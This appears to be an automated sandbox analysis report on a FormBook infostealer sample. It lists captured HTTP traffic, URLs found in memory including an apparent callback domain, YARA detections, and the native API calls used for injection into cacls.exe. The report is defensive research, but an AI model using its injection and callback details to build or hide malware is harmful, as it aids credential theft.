                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:07:20 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: PGK60fNNCZ.exeString found in binary or memory: http://www.elderscrolls.com/skyrim/characterK
                Source: PGK60fNNCZ.exeString found in binary or memory: http://www.elderscrolls.com/skyrim/characterT
                Source: PGK60fNNCZ.exeString found in binary or memory: http://www.elderscrolls.com/skyrim/player
                Source: QxPduTOtZWkp.exe, 0000000C.00000002.2550953930.0000000000F25000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.golivenow.live
                Source: QxPduTOtZWkp.exe, 0000000C.00000002.2550953930.0000000000F25000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.golivenow.live/r2k9/
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cacls.exe, 00000009.00000002.2554684215.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2552511952.000000000358A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: cacls.exe, 00000009.00000002.2554684215.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2552511952.000000000358A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033N
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: cacls.exe, 00000009.00000003.2048493633.000000000813F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0042CE23 NtClose,6_2_0042CE23
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2B60 NtClose,LdrInitializeThunk,6_2_00FD2B60
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00FD2C70
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00FD2DF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD35C0 NtCreateMutant,LdrInitializeThunk,6_2_00FD35C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD4340 NtSetContextThread,6_2_00FD4340
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD4650 NtSuspendThread,6_2_00FD4650
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2AF0 NtWriteFile,6_2_00FD2AF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2AD0 NtReadFile,6_2_00FD2AD0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2AB0 NtWaitForSingleObject,6_2_00FD2AB0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2BF0 NtAllocateVirtualMemory,6_2_00FD2BF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2BE0 NtQueryValueKey,6_2_00FD2BE0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2BA0 NtEnumerateValueKey,6_2_00FD2BA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2B80 NtQueryInformationFile,6_2_00FD2B80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2CF0 NtOpenProcess,6_2_00FD2CF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2CC0 NtQueryVirtualMemory,6_2_00FD2CC0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2CA0 NtQueryInformationToken,6_2_00FD2CA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2C60 NtCreateKey,6_2_00FD2C60
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2C00 NtQueryInformationProcess,6_2_00FD2C00
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2DD0 NtDelayExecution,6_2_00FD2DD0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2DB0 NtEnumerateKey,6_2_00FD2DB0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2D30 NtUnmapViewOfSection,6_2_00FD2D30
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2D10 NtMapViewOfSection,6_2_00FD2D10
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2D00 NtSetInformationFile,6_2_00FD2D00
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2EE0 NtQueueApcThread,6_2_00FD2EE0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2EA0 NtAdjustPrivilegesToken,6_2_00FD2EA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2E80 NtReadVirtualMemory,6_2_00FD2E80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2E30 NtWriteVirtualMemory,6_2_00FD2E30
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2FE0 NtCreateFile,6_2_00FD2FE0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2FB0 NtResumeThread,6_2_00FD2FB0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2FA0 NtQuerySection,6_2_00FD2FA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2F90 NtProtectVirtualMemory,6_2_00FD2F90
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2F60 NtCreateProcessEx,6_2_00FD2F60
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2F30 NtCreateSection,6_2_00FD2F30
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD3090 NtSetValueKey,6_2_00FD3090
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD3010 NtOpenDirectoryObject,6_2_00FD3010
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD39B0 NtGetContextThread,6_2_00FD39B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD3D70 NtOpenThread,6_2_00FD3D70
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD3D10 NtOpenProcessToken,6_2_00FD3D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03854340 NtSetContextThread,LdrInitializeThunk,9_2_03854340
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03854650 NtSuspendThread,LdrInitializeThunk,9_2_03854650
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03852BA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03852BE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03852BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852B60 NtClose,LdrInitializeThunk,9_2_03852B60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852AD0 NtReadFile,LdrInitializeThunk,9_2_03852AD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852AF0 NtWriteFile,LdrInitializeThunk,9_2_03852AF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852FB0 NtResumeThread,LdrInitializeThunk,9_2_03852FB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852FE0 NtCreateFile,LdrInitializeThunk,9_2_03852FE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852F30 NtCreateSection,LdrInitializeThunk,9_2_03852F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03852E80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03852EE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852DD0 NtDelayExecution,LdrInitializeThunk,9_2_03852DD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03852DF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03852D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03852D30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03852CA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852C60 NtCreateKey,LdrInitializeThunk,9_2_03852C60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03852C70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038535C0 NtCreateMutant,LdrInitializeThunk,9_2_038535C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038539B0 NtGetContextThread,LdrInitializeThunk,9_2_038539B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852B80 NtQueryInformationFile,9_2_03852B80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852AB0 NtWaitForSingleObject,9_2_03852AB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852F90 NtProtectVirtualMemory,9_2_03852F90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852FA0 NtQuerySection,9_2_03852FA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852F60 NtCreateProcessEx,9_2_03852F60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852EA0 NtAdjustPrivilegesToken,9_2_03852EA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852E30 NtWriteVirtualMemory,9_2_03852E30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852DB0 NtEnumerateKey,9_2_03852DB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852D00 NtSetInformationFile,9_2_03852D00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852CC0 NtQueryVirtualMemory,9_2_03852CC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852CF0 NtOpenProcess,9_2_03852CF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852C00 NtQueryInformationProcess,9_2_03852C00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03853090 NtSetValueKey,9_2_03853090
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03853010 NtOpenDirectoryObject,9_2_03853010
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03853D10 NtOpenProcessToken,9_2_03853D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03853D70 NtOpenThread,9_2_03853D70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF9560 NtCreateFile,9_2_00BF9560
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF96D0 NtReadFile,9_2_00BF96D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF97D0 NtDeleteFile,9_2_00BF97D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF9870 NtClose,9_2_00BF9870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF99D0 NtAllocateVirtualMemory,9_2_00BF99D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360F813 NtMapViewOfSection,9_2_0360F813
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360F8BA NtUnmapViewOfSection,9_2_0360F8BA
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_06EE18F00_2_06EE18F0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_06EE14B80_2_06EE14B8
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_06EE10800_2_06EE1080
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_06EE0C480_2_06EE0C48
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_027CCD240_2_027CCD24
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_059BD9F90_2_059BD9F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00418CB36_2_00418CB3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0040E81C6_2_0040E81C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004033306_2_00403330
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004013E06_2_004013E0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0042F4736_2_0042F473
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004024FF6_2_004024FF
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004104836_2_00410483
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004025006_2_00402500
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0040E6836_2_0040E683
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004106A36_2_004106A3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00416EB36_2_00416EB3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004027046_2_00402704
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0040270F6_2_0040270F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004027106_2_00402710
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0040E7CA6_2_0040E7CA
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0040E7D36_2_0040E7D3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103A1186_2_0103A118
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010281586_2_01028158
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010541A26_2_010541A2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010601AA6_2_010601AA
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010581CC6_2_010581CC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010320006_2_01032000
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F901006_2_00F90100
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105A3526_2_0105A352
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010603E66_2_010603E6
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE3F06_2_00FAE3F0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010402746_2_01040274
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010202C06_2_010202C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010605916_2_01060591
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010444206_2_01044420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010524466_2_01052446
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA05356_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104E4F66_2_0104E4F6
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBC6E06_2_00FBC6E0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9C7C06_2_00F9C7C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA07706_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC47506_2_00FC4750
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE8F06_2_00FCE8F0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F868B86_2_00F868B8
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0106A9A66_2_0106A9A6
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA28406_2_00FA2840
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAA8406_2_00FAA840
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A06_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB69626_2_00FB6962
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105AB406_2_0105AB40
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9EA806_2_00F9EA80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01056BD76_2_01056BD7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90CF26_2_00F90CF2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103CD1F6_2_0103CD1F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0C006_2_00FA0C00
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9ADE06_2_00F9ADE0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB8DBF6_2_00FB8DBF
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01040CB56_2_01040CB5
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAAD006_2_00FAAD00
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01042F306_2_01042F30
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01014F406_2_01014F40
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2E906_2_00FB2E90
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101EFA06_2_0101EFA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0E596_2_00FA0E59
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FACFE06_2_00FACFE0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105EE266_2_0105EE26
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F92FC86_2_00F92FC8
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105CE936_2_0105CE93
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC0F306_2_00FC0F30
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FE2F286_2_00FE2F28
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105EEDB6_2_0105EEDB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA70C06_2_00FA70C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0106B16B6_2_0106B16B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAB1B06_2_00FAB1B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8F1726_2_00F8F172
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD516C6_2_00FD516C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104F0CC6_2_0104F0CC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105F0E06_2_0105F0E0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010570E96_2_010570E9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105132D6_2_0105132D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBB2C06_2_00FBB2C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA52A06_2_00FA52A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FE739A6_2_00FE739A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8D34C6_2_00F8D34C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010412ED6_2_010412ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010575716_2_01057571
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F914606_2_00F91460
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103D5B06_2_0103D5B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010695C36_2_010695C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105F43F6_2_0105F43F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105F7B06_2_0105F7B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FE56306_2_00FE5630
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010516CC6_2_010516CC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010359106_2_01035910
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA38E06_2_00FA38E0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100D8006_2_0100D800
